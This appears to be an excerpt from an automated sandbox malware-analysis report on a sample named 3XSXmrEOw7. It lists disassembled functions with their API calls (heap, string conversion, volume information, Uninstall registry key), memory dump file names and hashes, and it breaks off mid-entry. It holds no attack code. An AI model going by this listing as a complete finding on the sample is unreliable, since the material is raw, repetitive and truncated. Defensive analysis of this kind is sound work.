                                                                                                                                              Function 0042AF8F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __lock.LIBCMT ref: 0042B00F
                                                                                                                                              • __lock.LIBCMT ref: 0042B040
                                                                                                                                                • Part of subcall function 0042400B: __lock.LIBCMT ref: 00424029
                                                                                                                                                • Part of subcall function 0042400B: HeapFree.KERNEL32(00000000,?,0044C948,0000000C,0042981C,00000000,0044CDF0,00000008,00429851,?,?,?,00423F79,00000004,0044C938,0000000C), ref: 00424070
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __lock$FreeHeap
                                                                                                                                              • String ID: @bE
                                                                                                                                              • API String ID: 743385489-3735480552
                                                                                                                                              • Opcode ID: e9b2ec0dc0123e412d69c5196f3f427e9980556b1049e712b9c385e69edacffc
                                                                                                                                              • Instruction ID: 731fc6a72e954c2201cc3ad4f1ba7e74df98332f7485061ff758e95a60e6a6fe
                                                                                                                                              • Opcode Fuzzy Hash: e9b2ec0dc0123e412d69c5196f3f427e9980556b1049e712b9c385e69edacffc
                                                                                                                                              • Instruction Fuzzy Hash: D73191717006209BC626AB69F54591FB3B5EF44718BE9094FE510DB292DB3EEC80CA5C
                                                                                                                                              Function 0042B4E2 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 105COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __getbuf
                                                                                                                                              • String ID: hE$@hE
                                                                                                                                              • API String ID: 554500569-3527237109
                                                                                                                                              • Opcode ID: 2d09c157eed4a3bd63498b0e5f70137e9fd5757940b0b5303955637cf367db83
                                                                                                                                              • Instruction ID: f17e0a6b82f98ebd52715b5456d606124dd6aad15095f93feb889772c3e2a4ef
                                                                                                                                              • Opcode Fuzzy Hash: 2d09c157eed4a3bd63498b0e5f70137e9fd5757940b0b5303955637cf367db83
                                                                                                                                              • Instruction Fuzzy Hash: 3731A271600710AFC7308F19D841B6677A4EF51329F54C92FE8AA8B291D73CE984CB88
                                                                                                                                              Function 0040F740 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104,?,0040F91B,00000001,?), ref: 0040F763
                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000), ref: 0040F818
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ByteCharMultiWide
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 626452242-3916222277
                                                                                                                                              • Opcode ID: 84796c686fa8f72b5e6dfbd94a193fb8d16dbb584841e412bd2790552e76208a
                                                                                                                                              • Instruction ID: df888b1d167fcae8043a8df2e68d74cec1358aa0cf7ec91854029ad9e172171b
                                                                                                                                              • Opcode Fuzzy Hash: 84796c686fa8f72b5e6dfbd94a193fb8d16dbb584841e412bd2790552e76208a
                                                                                                                                              • Instruction Fuzzy Hash: C0216BB610435166E330A724DC42BEB72F4EBC4751F10853EF6D69A1D0E7785449C39B
                                                                                                                                              Function 00438450 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetClassInfoA.USER32(?,-0000007C,?), ref: 004384AF
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ClassInfo
                                                                                                                                              • String ID: Afx:%p:%x$Afx:%p:%x:%p:%p:%p
                                                                                                                                              • API String ID: 3534257612-2801496823
                                                                                                                                              • Opcode ID: dbe3cc86fff193af0684558f81ef42c515353e085cb2aed473aa4667f0f1f147
                                                                                                                                              • Instruction ID: b8301b33258d6b108bdec7fe8fd4c628fef138bfb49540b2024fb64cfbea2f2c
                                                                                                                                              • Opcode Fuzzy Hash: dbe3cc86fff193af0684558f81ef42c515353e085cb2aed473aa4667f0f1f147
                                                                                                                                              • Instruction Fuzzy Hash: 2721307190020AAF9B10EFA5D8419DFBBB8EE59354F00402FF904E3201E7789951CBA9
                                                                                                                                              Function 0042885F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • GetFileType.KERNEL32(?,?,?,0044CD70,00000010), ref: 0042888B
                                                                                                                                              • GetLastError.KERNEL32(?,?,0044CD70,00000010), ref: 00428895
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorFileLastType
                                                                                                                                              • String ID: @
                                                                                                                                              • API String ID: 1621975986-2766056989
                                                                                                                                              • Opcode ID: 9d470b187b4003eda84a808b721a4d16f15e0ebc08515a3edff5cbffdd3650a1
                                                                                                                                              • Instruction ID: 9fa63de9de4804d11020a97d9c36dddd01b917bd1e54f2f62cb2b06b9a7854a5
                                                                                                                                              • Opcode Fuzzy Hash: 9d470b187b4003eda84a808b721a4d16f15e0ebc08515a3edff5cbffdd3650a1
                                                                                                                                              • Instruction Fuzzy Hash: 8211B1717472685AEF21BB35E80539D3B50AF02328FD8864EE9A0572E3DF3C56419B4E
                                                                                                                                              Function 0040F5A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • SetLastError.KERNEL32(00000000), ref: 0040F5D8
                                                                                                                                              • GetVolumeInformationA.KERNEL32 ref: 0040F608
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorInformationLastVolume
                                                                                                                                              • String ID: CDFS
                                                                                                                                              • API String ID: 2466915109-2335696158
                                                                                                                                              • Opcode ID: 1ec4429c2c58c8115991c57e6d5b520f750cf642e641293ec524bb6b560938c4
                                                                                                                                              • Instruction ID: 0ba698df5349420569fcb0b07cbe6f9900faa6667f1b351f96fad5a35dfb1ad2
                                                                                                                                              • Opcode Fuzzy Hash: 1ec4429c2c58c8115991c57e6d5b520f750cf642e641293ec524bb6b560938c4
                                                                                                                                              • Instruction Fuzzy Hash: EC1127766042016BE711CB58DC05BD7BBE4ABD5300F04C87DF58457181EAB4994DC763
                                                                                                                                              Function 00427102 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22threadCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseExitHandleThread
                                                                                                                                              • String ID: m:B
                                                                                                                                              • API String ID: 3411751092-37060516
                                                                                                                                              • Opcode ID: 80a6baf8b596835e4e6d2e0790cb893599dbd790eb416e0551c22c3cf0ec0443
                                                                                                                                              • Instruction ID: 38546fa7c7f44993b21125da49d9b9c894fd7afa0086638ea366401a8295a73f
                                                                                                                                              • Opcode Fuzzy Hash: 80a6baf8b596835e4e6d2e0790cb893599dbd790eb416e0551c22c3cf0ec0443
                                                                                                                                              • Instruction Fuzzy Hash: B4E02C30300A3017C23237B8BC09B3E6284AF02720FC5061AF864CA2C0CF6CCC0041AE
                                                                                                                                              Function 00417520 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19registryCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • RegCloseKey.ADVAPI32(?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00418332,80000002,?,?,80000002,?,80000002,?), ref: 0041752A
                                                                                                                                              • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00418332,80000002,?,?,80000002,?,80000002,?), ref: 0041754B
                                                                                                                                              Strings
                                                                                                                                              • SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00417520
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2353147726.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2353103840.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353207574.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353231287.0000000000454000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353254456.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353280830.0000000000457000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353315492.0000000000483000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353338960.000000000049E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353355423.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353386696.00000000004E1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000004FA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.000000000059D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353407938.00000000005B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353536536.00000000005E5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353581301.0000000000623000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353607558.0000000000638000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353627799.000000000063C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353650757.0000000000653000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2353669972.0000000000655000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_3XSXmrEOw7.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseOpen
                                                                                                                                              • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                                                              • API String ID: 47109696-1023437679
                                                                                                                                              • Opcode ID: 444a49b0fa5d6bc81e2978ef739fc310acf3f21d06593166a15287e9831d7ba9
                                                                                                                                              • Instruction ID: 0f0fbff194b733e9befad18985cc3632bf2348863539eaefa16bfffbd4cac233
                                                                                                                                              • Opcode Fuzzy Hash: 444a49b0fa5d6bc81e2978ef739fc310acf3f21d06593166a15287e9831d7ba9
                                                                                                                                              • Instruction Fuzzy Hash: 78E0EC75504310AFD370DF58EC49F87BBE8EF4A750F01881EB889D3250D6749840CBA5
                                                                                                                                              Function 0042C770 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 17COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              • __lock.LIBCMT ref: 0042C78D
